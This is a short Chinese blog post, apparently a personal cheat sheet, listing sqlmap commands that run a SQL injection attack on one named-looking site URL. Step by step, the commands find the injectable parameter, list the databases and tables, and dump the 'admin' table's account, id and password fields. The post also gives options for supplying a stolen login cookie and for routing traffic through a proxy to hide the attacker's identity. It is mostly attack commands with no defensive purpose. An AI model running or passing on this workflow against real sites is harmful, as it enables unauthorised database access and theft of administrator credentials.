昔日

sqlmal-command

跨界Coder:

检查注入点


sqlmap -u http://ooxx.com.tw/star_photo.php?artist_id=11




列数据库信息


sqlmap -u http://ooxx.com.tw/star_photo.php?artist_id=11 --dbs




指定库名列出所有表


sqlmap -u http://ooxx.com.tw/star_photo.php?artist_id=11 -D vhost48330 --tables




指定库名表名列出所有字段


sqlmap -u http://ooxx.com.tw/star_photo.php?artist_id=11 -D vhost48330 -T admin --columns




指定库名表名字段dump出指定字段


sqlmap -u http://ooxx.com.tw/star_photo.php?artist_id=11 -D vhost48330 -T admin -C ac,id,password --dump




--cookie=COOKIE                 在需要登录的地方,需要登录后的cookie


--proxy="http://127.0.0.1:8087" 使用HTTP代理隐藏自己的身份,比如使用goagent等


--sql-query=QUERY               执行一个sql语句,不一定支持




D:\software\sqlmapproject-sqlmap-17bfda1

评论

热度(1)

  1. 昔日在蚊香旁边飞的蚊子 转载了此文字